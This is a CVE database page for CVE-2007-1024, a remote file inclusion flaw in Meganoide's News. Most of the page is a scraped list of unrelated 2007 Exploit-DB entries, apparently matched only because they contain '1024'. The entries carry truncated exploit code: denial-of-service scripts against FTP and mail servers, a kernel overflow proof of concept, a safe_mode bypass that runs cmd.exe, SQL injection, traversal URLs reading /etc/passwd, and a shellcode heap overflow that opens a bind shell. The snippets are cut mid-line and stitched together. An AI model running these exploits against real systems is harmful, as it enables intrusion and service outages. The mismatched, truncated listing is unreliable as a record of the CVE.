CVE-2007-1024
published 2007-02-21CVE-2007-1024: PHP remote file inclusion vulnerability in include.php in Meganoide's news 1.1.1 allows remote attackers to execute arbitrary PHP code via a URL in the…
PriorityP348critical10CVSS 2.0
AVNACLAuNCCICAC
EXPLOIT
EPSS
4.86%
90.9th percentile
PHP remote file inclusion vulnerability in include.php in Meganoide's news 1.1.1 allows remote attackers to execute arbitrary PHP code via a URL in the _SERVER[DOCUMENT_ROOT] parameter.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| marcello_vitagliano | meganoides_news | — | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
1024 CMS 1.3.1 - Local File Inclusion / SQL Injection
exploitdb·2007-12-21
CVE-2007-6584 1024 CMS 1.3.1 - Local File Inclusion / SQL Injection
1024 CMS 1.3.1 - Local File Inclusion / SQL Injection
---
vuln.: 1024 CMS 1.3.1 (LFI/SQL) Multiple Vulnerabilities
script info and download: http://www.1024cms.com
author: irk4z[at]yahoo.pl
greets to: str0ke, wacky
'-----------------------------------------------------------------------------'
# sql-injection:
code:
/admin/ops/findip/ajax/search.php:
...
8 $get_users = mysql_query("SELECT id, username FROM ".$prefix."users WHERE ip='".$_POST['ip']."'") or die("cannot get ips: ".mysql_error());
...
^ if magic_quotes_gpc==off, we can get all usernames and passwords from database ;]
exploit:
# local file inclusion:
code:
/admin/ops/reports/ops/download.php, /admin/ops/reports/ops/forum.php, /admin/ops/reports/ops/news.php:
...
1 <?php
2 include("./themes/".$admin_theme_dir."
Exploit-DB
Perl Net::DNS 0.48/0.59/0.60 - DNS Response Remote Denial of Service
exploitdb·2007-12-17
CVE-2007-6341 Perl Net::DNS 0.48/0.59/0.60 - DNS Response Remote Denial of Service
Perl Net::DNS 0.48/0.59/0.60 - DNS Response Remote Denial of Service
---
source: https://www.securityfocus.com/bid/26902/info
The Perl Net::DNS module is prone to a remote denial-of-service vulnerability because the module fails to properly handle malformed DNS responses.
Successfully exploiting this issue allows attackers to crash applications that use the affected module.
Net::DNS 0.60 is vulnerable; other versions may also be affected.
#!/usr/bin/perl
# Beyond Security(c)
# Vulnerability found by beSTORM - DNS Server module
use strict;
use IO::Socket;
my($sock, $oldmsg, $newmsg, $hisaddr, $hishost, $MAXLEN, $PORTNO);
$MAXLEN = 1024;
$PORTNO = 5351;
$sock = IO::Socket::INET->new(LocalPort => $PORTNO, Proto => 'udp') or die "socket: $@";
print "Awaiting UDP messages on port $PORTNO
Exploit-DB
Apple Mac OSX 10.4.x Kernel - 'i386_set_ldt()' Integer Overflow (PoC)
exploitdb·2007-11-16
CVE-2007-4684 Apple Mac OSX 10.4.x Kernel - 'i386_set_ldt()' Integer Overflow (PoC)
Apple Mac OSX 10.4.x Kernel - 'i386_set_ldt()' Integer Overflow (PoC)
---
#include
#include
#include
#include
#include
#include
#include
int
main(void)
{
union ldt_entry descs;
char *buf;
u_long pgsz = sysconf(_SC_PAGESIZE);
if ((buf = (char *)malloc(pgsz * 4)) == -1) {
perror("malloc");
exit(EXIT_FAILURE);
}
memset(buf, 0x41, pgsz * 4);
buf = (char *)(((u_long)buf & ~pgsz) + pgsz);
if (mprotect((char *)((u_long)buf + (pgsz * 2)), (size_t)pgsz,
PROT_WRITE) == -1) {
perror("mprotect");
exit(EXIT_FAILURE);
}
/*
* This will result in kalloc() size argument being 0x00000000 and
copyin()
* size argument being 0xfffffff8.
*/
if (i386_set_ldt(1024, (union ldt_entry *)&buf, -1) == -1) {
perror("i386_set_ldt");
exit(EXIT_FAILURE);
}
exit(EXIT_SUCCESS);
}
// milw0rm.com [2007-11-16]
Exploit-DB
PHP 'FFI' Extension 5.0.5 - 'Safe_mode' Local Bypass
exploitdb·2007-08-23
CVE-2007-4528 PHP 'FFI' Extension 5.0.5 - 'Safe_mode' Local Bypass
PHP 'FFI' Extension 5.0.5 - 'Safe_mode' Local Bypass
---
WinExec("cmd.exe /c $command >\"$output\"",0);
while(!file_exists($output))sleep(1);
$con='';
$fp=fopen($output,'r');
while(!feof($fp))$con.=fgets($fp,1024);
fclose($fp);
$con=htmlspecialchars($con);
echo "$con";
unlink($output);
?>
# milw0rm.com [2007-08-23]
Exploit-DB
Asterisk < 1.2.22/1.4.8/2.2.1 - 'chan_skinny' Remote Denial of Service
exploitdb·2007-07-18
CVE-2007-3764 Asterisk < 1.2.22/1.4.8/2.2.1 - 'chan_skinny' Remote Denial of Service
Asterisk
#include
#include
#include
#include
#include
#include
#include
#include
#define SKINNY_TCP_PORT 2000
#define CLEN 1024
#define SKINNY_MAX_SIZE 1000
#define REGISTER_MESSAGE 0x0001
struct register_message {
char name[16];
uint32_t userId;
uint32_t instance;
uint32_t ip;
uint32_t type;
uint32_t maxStreams;
};
struct skinny_client {
int sd;
struct sockaddr_in saddr;
int active;
char rhost[CLEN];
char username[CLEN];
char password[CLEN];
char packet[SKINNY_MAX_SIZE];
};
struct skinny_client_message {
int len;
int res;
int e; /* 12 bytes */
char *data;
};
struct skinny_client *g_sc;
struct messages {
int e;
char *human;
int (* const message_handler)(struct skinny_client *sc, struct skinny_client_message *scm);
} message_list[] = {
{0x81,"Register Ack Message\n", NULL},
{0x9b,"Capabil
Exploit-DB
ELinks Relative 0.10.6/011.1 - Path Arbitrary Code Execution
exploitdb·2007-05-07
CVE-2007-2027 ELinks Relative 0.10.6/011.1 - Path Arbitrary Code Execution
ELinks Relative 0.10.6/011.1 - Path Arbitrary Code Execution
---
source: https://www.securityfocus.com/bid/23844/info
ELinks is prone to an arbitrary code-execution vulnerability.
An attacker can exploit this issue to potentially execute arbitrary code with the privileges of the user running the affected application.
This issue requires an attacker to trick an unsuspecting victim into running the vulnerable application in an attacker-controlled directory.
This issue affects ELinks 0.11.1; other versions may also be vulnerable.
$ mkdir -p /tmp/elinks/{run,po}
$ cp /usr/share/locale/fr/LC_MESSAGES/elinks.mo /tmp/elinks/po/fr.gmo
$ dd if=/dev/urandom of=/tmp/elinks/po/fr.gmo bs=1024 seek=1 count=200
$ cd /tmp/elinks/run
Exploit-DB
1024 CMS 0.7 - 'download.php' Remote File Disclosure
exploitdb·2007-05-02
CVE-2007-2507 1024 CMS 0.7 - 'download.php' Remote File Disclosure
1024 CMS 0.7 - 'download.php' Remote File Disclosure
---
\#'#/
(-.-)
--------------------oOO---(_)---OOo-------------------
| [ Y! Underground Group ] |
| [ www.dj7xpl.2600.ir ] |
| [ Dj7xpl @ 2600.ir ] |
[!] Portal : 1024 CMS Version 0.7
[!] Vendor : http://www.treble.lfhost.com
[!] Author : Dj7xpl
[!] Type : Remote File Disclosure Vuln
[!] We Are : Y4Ho0 -Mr.Mithridates -Sir SiSiLi -System Failure -Satanic Soulfull -And Me
PoC :
http://[Target]/[Path]/includes/download.php?item=../uploads/[File]
http://Target.com/1024/includes/download.php?item=../uploads/../../../../../etc/passwd
# milw0rm.com [2007-05-02]
Exploit-DB
Fully Modded PHPBB2 - 'phpbb_root_path' Remote File Inclusion
exploitdb·2007-04-19
CVE-2007-2257 Fully Modded PHPBB2 - 'phpbb_root_path' Remote File Inclusion
Fully Modded PHPBB2 - 'phpbb_root_path' Remote File Inclusion
---
source: https://www.securityfocus.com/bid/23565/info
Fully Modded PHPBB2 is prone to a remote file-include vulnerability because it fails to sufficiently sanitize user-supplied data.
Exploiting this issue may allow an attacker to compromise the application and the underlying system; other attacks are also possible.
*/
/* Website : WwW.SoQoR.NeT */
/************************************************/
error_reporting(0);
ini_set("max_execution_time",0);
Function
get_page($url){if(function_exists("file_get_contents")){$contents=file_get_contents($url);}else{$fp=fopen("$url","r");while($line=fread($fp,1024)){$contents=$contents
.$line;}}return$contents;}
Echo "\nFully Moded PHPBB2 Command Execution Exploit by : HACKERS PAL :
Exploit-DB
IBM Lotus Domino Server 6.5 - 'Username' Remote Denial of Service
exploitdb·2007-03-29
CVE-2007-1675 IBM Lotus Domino Server 6.5 - 'Username' Remote Denial of Service
IBM Lotus Domino Server 6.5 - 'Username' Remote Denial of Service
---
#!/usr/bin/python
#
# Remote DOS exploit code for IBM Lotus Domino Server 6.5. Tested on windows
# 2000 server SP4. The code crashes the IMAP server. Since this is a simple DOS
# where 256+ (but no more than 270) bytes for the username crashes the service
# this is likely to work on other windows platform aswell. Maybe someone can carry this further and come out
# with a code exec exploit.
#
# Author shall bear no reponsibility for any screw ups caused by using this code
# Winny Thomas :-)
#
import sys
import md5
import struct
import base64
import socket
def ExploitLotus(target):
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect((target, 143))
response = sock.recv(1024)
print response
auth = 'a0
Exploit-DB
FTPDMIN 0.96 - 'LIST' Remote Denial of Service
exploitdb·2007-03-20
CVE-2007-1580 FTPDMIN 0.96 - 'LIST' Remote Denial of Service
FTPDMIN 0.96 - 'LIST' Remote Denial of Service
---
# usr/bin/python
import socket
import time
print
"-----------------------------------------------------------------------"
print "# FTPDMIN v. 0.96 LIST Denial of Service"
print "# url: http://www.sentex.net/~mwandel/ftpdmin/"
print "# author: shinnai"
print "# mail: shinnai[at]autistici[dot]org"
print "# site: http://shinnai.altervista.org"
print
"-----------------------------------------------------------------------\n"
buff = "//A:"
user = "anonymous"
password = "shinnai"
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
conn = s.connect(("127.0.0.1",21))
d = s.recv(1024)
print "Server USER " + user
d = s.recv(1024)
print "Server PASS " + password
d = s.recv(1024)
print "Server LIST " + buff
d = s.recv(1024)
print d
tim
Exploit-DB
PHP 5.1.6 - Mb_Parse_Str Function Register_Globals Activation
exploitdb·2007-03-19
CVE-2007-1583 PHP 5.1.6 - Mb_Parse_Str Function Register_Globals Activation
PHP 5.1.6 - Mb_Parse_Str Function Register_Globals Activation
---
source: https://www.securityfocus.com/bid/23016/info
PHP is prone to a weakness that allows attackers to enable the 'register_globals' directive because the application fails to handle a memory-limit exception.
Enabling the PHP 'register_globals' directive may allow attackers to further exploit latent vulnerabilities in PHP scripts.
This issue is related to the weakness found in the non-multibyte 'parse_str()' from BID 15249 - PHP Parse_Str Register_Globals Activation Weakness.
This issue affects PHP 4 to 4.4.6 and 5 to 5.2.1.
2048) $x[] = str_repeat("A", 1024);
// Will activate register_globals and trigger the memory_limit
mb_parse_str($str);
?>
Exploit-DB
Microsoft Internet Explorer - FTP Server Response Denial of Service (MS07-016)
exploitdb·2007-03-09
CVE-2007-0217 Microsoft Internet Explorer - FTP Server Response Denial of Service (MS07-016)
Microsoft Internet Explorer - FTP Server Response Denial of Service (MS07-016)
---
#!/usr/bin/perl
# MS 07-016 FTP Server Response PoC
# Usage: ./ms07016ftp.pl [LISTEN_IP]
#
# Tested Against: MSIE 6.02900.2180 (SP2)
#
# Details: The response is broken into buffers, either at length 1024,
# or at '\r\n'. Each buffer is apended with \x00, without
# bounds checking. If the response is exctly 1024 characters
# in length, you will overflow the heap with the string \x00.
use IO::Socket;
use strict;
# Create listener
my $ip=shift || '127.0.0.1';
my $sock = IO::Socket::INET->new(Listen=>1,
LocalHost=>$ip,
LocalPort=>'21',
Proto=>'tcp');
$sock or die ("Could not create listener.\nMake sure no FTP server is running, and you are running this as root.\n");
# Wait for initial connection and send
Exploit-DB
PHP < 4.4.5/5.2.1 - 'shmop' SSL RSA Private-Key Disclosure
exploitdb·2007-03-07
CVE-2007-1376 PHP < 4.4.5/5.2.1 - 'shmop' SSL RSA Private-Key Disclosure
PHP 0)
break;
}
}
$offset += 1024;
}
header("Content-type: application/octet-stream");
header("Content-Disposition: attachment; filename=\"server.der\"");
echo $keydata;
?>
# milw0rm.com [2007-03-07]
Exploit-DB
radscan conquest 8.2 - Multiple Vulnerabilities
exploitdb·2007-03-07
CVE-2007-1371 radscan conquest 8.2 - Multiple Vulnerabilities
radscan conquest 8.2 - Multiple Vulnerabilities
---
source: https://www.securityfocus.com/bid/22855/info
Conquest is prone to multiple remotely exploitable vulnerabilities, including a stack-based buffer-overflow vulnerability and a memory-corruption vulnerability.
An attacker can exploit these issues to execute arbitrary code within the context of the affected application or cause the affected application to crash, denying service to legitimate users.
These issues affect version 8.2a; prior versions may also be affected.
1. Launch a fake metaserver that sends more than 1024 chars:
perl -e 'print "a"x1200' | nc -l -p 1700 -v -v -n
2. Launch the client, specifying the alternate metaserver:
conquest -m -M 127.0.0.1
3. Interrupt the fake metaserver: conquest should have been crashed
t
Exploit-DB
Microsoft Windows XP/2003 - ReadDirectoryChangesW Information Disclosure
exploitdb·2007-02-22
CVE-2007-0843 Microsoft Windows XP/2003 - ReadDirectoryChangesW Information Disclosure
Microsoft Windows XP/2003 - ReadDirectoryChangesW Information Disclosure
---
// source: https://www.securityfocus.com/bid/22664/info
Microsoft Windows is prone to a local information-disclosure vulnerability.
A local attacker may leverage this issue to gain access to potentially sensitive information about user permissions and accessed files. Information gained may aid in further attacks against the affected computer.
/*
Monitors directory changes
(c) 2006-2007 Vladimir Dubrovin, 3APA3A
http://securityvulns.com/
http://securityvulns.ru/
*/
#include
#include
#include
int main(int argc, char *argv[]){
HANDLE hDir;
char buf[1024];
FILE_NOTIFY_INFORMATION * fn;
int read;
WCHAR * action = NULL;
if(argc != 2) {
printf(
"Usage: %s \n"
" Monitor directory changes with all subdirectories\
Exploit-DB
FTP Explorer 1.0.1 Build 047 - Remote CPU Consumption (Denial of Service)
exploitdb·2007-02-20
CVE-2007-1082 FTP Explorer 1.0.1 Build 047 - Remote CPU Consumption (Denial of Service)
FTP Explorer 1.0.1 Build 047 - Remote CPU Consumption (Denial of Service)
---
/***********************************************************************************
* FTP Explorer 1.0.1 Build 047 Remote DoS (CPU consumption) *
* *
* FTP Explorer is prone to a DoS after receiving a long PWD response leading to *
* 100% CPU consumption. *
* Have Fun! *
* *
* Coded by Marsu *
***********************************************************************************/
#include "winsock2.h"
#include "stdio.h"
#include "stdlib.h"
#include "windows.h"
#pragma comment(lib, "ws2_32.lib")
int main(int argc, char* argv[])
{
char recvbuff[1024];
char evilbuff[30000];
sockaddr_in sin;
int server,client;
WSADATA wsaData;
WSAStartup(MAKEWORD(1,1), &wsaData);
server = socket(PF_INET, SOCK_STREAM, IPPROTO_TCP)
Exploit-DB
FTP Voyager 14.0.0.3 - 'CWD' Remote Stack Overflow (PoC)
exploitdb·2007-02-20
CVE-2007-1079 FTP Voyager 14.0.0.3 - 'CWD' Remote Stack Overflow (PoC)
FTP Voyager 14.0.0.3 - 'CWD' Remote Stack Overflow (PoC)
---
/***********************************************************************************
* FTP Voyager .....................................B O O M *
* *
* Only a DoS, I dont think code execution is possible *
* *
* Have Fun! *
* *
* Coded by Marsu *
***********************************************************************************/
#include "winsock2.h"
#include "stdio.h"
#include "stdlib.h"
#include "windows.h"
#pragma comment(lib, "ws2_32.lib")
int main(int argc, char* argv[])
{
char recvbuff[1024];
char evilbuff[30000];
sockaddr_in sin;
int server,client;
WSADATA wsaData;
WSAStartup(MAKEWORD(1,1), &wsaData);
server = socket(PF_INET, SOCK_STREAM, IPPROTO_TCP);
sin.sin_family = PF_INET;
sin.sin_addr.s_addr = htonl(INADDR_ANY
Exploit-DB
VicFTPS < 5.0 - 'CWD' Remote Buffer Overflow (PoC)
exploitdb·2007-02-18
CVE-2007-1014 VicFTPS < 5.0 - 'CWD' Remote Buffer Overflow (PoC)
VicFTPS
#include
#include
#include
#include
#define PORT 21
int s;
struct sockaddr_in sock_addr;
char recvbuf[1024];
char pwn[450];
int main(int argc, char* argv[])
{
if (argc \n", argv[0]);
return 1; }
if ((s = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) < 0) {
printf("error with socket\n");
return 1; }
sock_addr.sin_family = AF_INET;
sock_addr.sin_addr.s_addr = inet_addr(argv[1]);
sock_addr.sin_port = htons(PORT);
if (connect(s, (struct sockaddr *)&sock_addr, sizeof(struct sockaddr)) == -1) {
printf("unable to connect\n");
return 1; }
printf("[+] Connected\n");
memset(recvbuf, '\0', 1024);
recv(s, recvbuf, 1024, 0);
char userbuf[50];
printf("[+] Sending user...\n");
memset(userbuf, '\0', 50);
memcpy(userbuf, "USER anonymous\r\n", 18);
if (send(s, userbuf, strlen(userbuf), 0) == -
Exploit-DB
Meganoide's News 1.1.1 - 'Include.php' Remote File Inclusion
exploitdb·2007-02-16
CVE-2007-1024 Meganoide's News 1.1.1 - 'Include.php' Remote File Inclusion
Meganoide's News 1.1.1 - 'Include.php' Remote File Inclusion
---
source: https://www.securityfocus.com/bid/22589/info
Meganoide's news is prone to a remote file-include vulnerability because it fails to sufficiently sanitize user-supplied input.
An attacker can exploit this issue to execute arbitrary PHP code in the context of the webserver process.
This issue affects version 1.1.1; other versions may also be affected.
http://www.example.com/path/include.php?_SERVER[DOCUMENT_ROOT]=[shell]
Exploit-DB
Axigen 2.0.0b1 - Remote Denial of Service (2)
exploitdb·2007-02-08
CVE-2007-0887 Axigen 2.0.0b1 - Remote Denial of Service (2)
Axigen 2.0.0b1 - Remote Denial of Service (2)
---
/* doaxigen-v2.c
*
* axigen 1.2.6 - 2.0.0b1 DoS (x86-lnx)
* by mu-b - Sun Oct 29 2006
*
* - Tested on: AXIGEN 1.2.6 (lnx)
* AXIGEN 2.0.0b1 (lnx)
*
* parsing error results in login without username & password!
* which in turn causes a NULL pointer dereference..
*/
/* dGFicyBhcmUgZm9yIGZhZ2dvdHNcIQ== */
#include
#include
#include
#include
#include
#include
#include
#include
#define BUF_SIZE 1024
#define BBUF_SIZE BUF_SIZE/3*4+1
#define AUTH_CMD "1 AUTHENTICATE PLAIN\r\n"
#define APPEND_CMD "2 APPEND digit-labs\r\n"
#define DEF_PORT 143
#define PORT_IMAPD DEF_PORT
#define RCNT_DELAY 3
static const char base64tab[] =
"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/";
static int base64 (const u_char * ibuf, u_char * ob
Exploit-DB
Axigen 2.0.0b1 - Remote Denial of Service (1)
exploitdb·2007-02-08
CVE-2007-0886 Axigen 2.0.0b1 - Remote Denial of Service (1)
Axigen 2.0.0b1 - Remote Denial of Service (1)
---
/* doaxigen.c
*
* axigen 1.2.6 - 2.0.0b1 DoS (x86-lnx)
* by mu-b - Sat Oct 22 2006
*
* - Tested on: AXIGEN 1.2.6 (lnx)
* AXIGEN 2.0.0b1 (lnx)
*
* 0x08088054: parsing error results in DoS (little-endian, confirmed)
* DoS + off-by-one heap smash (big-endian)
*
* Note: if you receive a SIGPIPE then you crashed the server
* but at too high a memory address... try again.
*/
/* dGFicyBhcmUgZm9yIGZhZ2dvdHNcIQ== */
#include
#include
#include
#include
#include
#include
#include
#include
#define BUF_SIZE 1024
#define BBUF_SIZE BUF_SIZE/3*4+1
#define AUTH_CMD "AUTH CRAM-MD5\r\n"
#define QUIT_CMD "QUIT\r\n"
#define DEF_PORT 110
#define PORT_POP3 DEF_PORT
#define RCNT_DELAY 3
static const char base64tab[] =
"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghij
Exploit-DB
CA BrightStor ARCserve - 'msgeng.exe' Remote Heap Overflow (2)
exploitdb·2007-01-28
CVE-2007-0449 CA BrightStor ARCserve - 'msgeng.exe' Remote Heap Overflow (2)
CA BrightStor ARCserve - 'msgeng.exe' Remote Heap Overflow (2)
---
#!/usr/bin/perl
#
# original exploit by lssec.com this is a perl porting
#
# acaro [at] jervus.it
use IO::Socket::INET;
use Switch;
if (@ARGV new(proto=>'tcp', PeerAddr=>$host, PeerPort=>$port);
$socket or die "Cannot connect to host!\n";
$request = $uuid;
send $socket, $request, 0;
print "[+] Sent uuid request\n";
recv($socket, $reply, 1024, 0);
$request = $special.("\x90"x680).$jmp.$ret.$uef.$shellcode.("\x90"x1006)."\r\n";
send $socket, $request, 0;
print "[+] Sent malicius 1st request\n";
$request = $special.("\x90"x680).$jmp.$ret.$uef.$shellcode.("\x90"x1029)."\r\n";
send $socket, $request, 0;
print "[+] Sent malicius 2nd request\n";
print " + Connect on 4444 port of $host ...\n";
sleep(3);
system("telnet
Exploit-DB
BolinTech DreamFTP Server - 'USER' Remote Buffer Overflow (PoC)
exploitdb·2007-01-14
CVE-2007-0338 BolinTech DreamFTP Server - 'USER' Remote Buffer Overflow (PoC)
BolinTech DreamFTP Server - 'USER' Remote Buffer Overflow (PoC)
---
/**************************************************************************
*BolinTech DreamFTP USER buffer overflow *
* *
*The server does not correctly handle format string so sending a command *
*like USER %1*3000 let us own EDX. Other values can also affect EAX & ECX *
* *
*This is only a POC but code execution is possible *
* *
*usage: dreamftp.exe ip port *
* *
*Coded by Marsu *
**************************************************************************/
#include "winsock2.h"
#include "stdio.h"
#include "stdlib.h"
#pragma comment(lib, "ws2_32.lib")
int main(int argc, char* argv[])
{
struct hostent *he;
struct sockaddr_in sock_addr;
WSADATA wsa;
int ftpsock;
char recvbuff[1024];
char evilbuff[5003];
int buflen=5000
Exploit-DB
WFTPD Pro Server 3.25 - Site ADMN Remote Denial of Service
exploitdb·2007-01-14
CVE-2007-0311 WFTPD Pro Server 3.25 - Site ADMN Remote Denial of Service
WFTPD Pro Server 3.25 - Site ADMN Remote Denial of Service
---
/************************************************************************
*WFTPD server *
************************************************************************/
#include "winsock2.h"
#include "stdio.h"
#include "stdlib.h"
#pragma comment(lib, "ws2_32.lib")
int main(int argc, char* argv[])
{
struct hostent *he;
struct sockaddr_in sock_addr;
WSADATA wsa;
int ftpsock;
char recvbuff[1024];
char evilbuff[100];
int buflen=100;
if (argc!=5)
{
printf("[+] Usage: %s \n",argv[0]);
return 1;
}
WSACleanup();
WSAStartup(MAKEWORD(2,0),&wsa);
printf("[+] Connecting to %s:%s ... ",argv[1],argv[2]);
if ((he=gethostbyname(argv[1])) == NULL) {
printf("Failed\n[-] Could not init gethostbyname\n");
return 1;
}
if ((ftpsock = socket(PF_INET
http://attrition.org/pipermail/vim/2007-February/001361.htmlhttp://osvdb.org/33736http://securityreason.com/securityalert/2266http://www.securityfocus.com/archive/1/460323/100/0/threadedhttp://www.securityfocus.com/bid/22589https://exchange.xforce.ibmcloud.com/vulnerabilities/32546http://attrition.org/pipermail/vim/2007-February/001361.htmlhttp://osvdb.org/33736http://securityreason.com/securityalert/2266http://www.securityfocus.com/archive/1/460323/100/0/threadedhttp://www.securityfocus.com/bid/22589https://exchange.xforce.ibmcloud.com/vulnerabilities/32546
2007-02-21
Published